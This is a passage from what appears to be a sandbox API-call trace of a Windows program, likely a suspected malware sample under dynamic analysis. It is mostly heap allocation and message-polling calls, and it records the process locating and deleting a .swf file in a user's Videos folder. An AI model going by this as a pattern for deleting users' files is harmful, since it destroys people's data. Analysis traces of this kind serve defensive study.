hHeap=0x8a0000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.173] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0198.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.173] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0198.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0198.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0198.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0198.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0198.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0198.174] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.174] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf", lpFilePart=0x0) returned 0x42 [0198.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0198.174] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\nseh3.swf")) returned 0x20 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0198.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0198.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0198.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee0d0 [0198.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0198.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0198.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0198.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee0d0 | out: hHeap=0x8a0000) returned 1 [0198.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0198.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0198.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.176] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7ff05d0, ftCreationTime.dwHighDateTime=0x1d5e6a3, ftLastAccessTime.dwLowDateTime=0x5a7a7540, ftLastAccessTime.dwHighDateTime=0x1d5dd98, ftLastWriteTime.dwLowDateTime=0x1b06bfe0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x180a6, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="NsEh3.swf", cAlternateFileName="")) returned 0x90ae18 [0198.176] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\nseh3.swf")) returned 1 [0198.178] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7ff05d0, ftCreationTime.dwHighDateTime=0x1d5e6a3, ftLastAccessTime.dwLowDateTime=0x5a7a7540, ftLastAccessTime.dwHighDateTime=0x1d5dd98, ftLastWriteTime.dwLowDateTime=0x1b06bfe0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x180a6, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="NsEh3.swf", cAlternateFileName="")) returned 0 [0198.178] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0198.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0198.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0198.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0198.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0198.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0198.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0198.180] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0198.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0198.182] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0198.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0198.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0198.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0198.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0198.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0198.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0198.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0198.182] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0198.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0198.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.183] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0198.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0198.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0198.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.184] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.184] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0198.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.185] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0198.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0198.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0198.185] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) 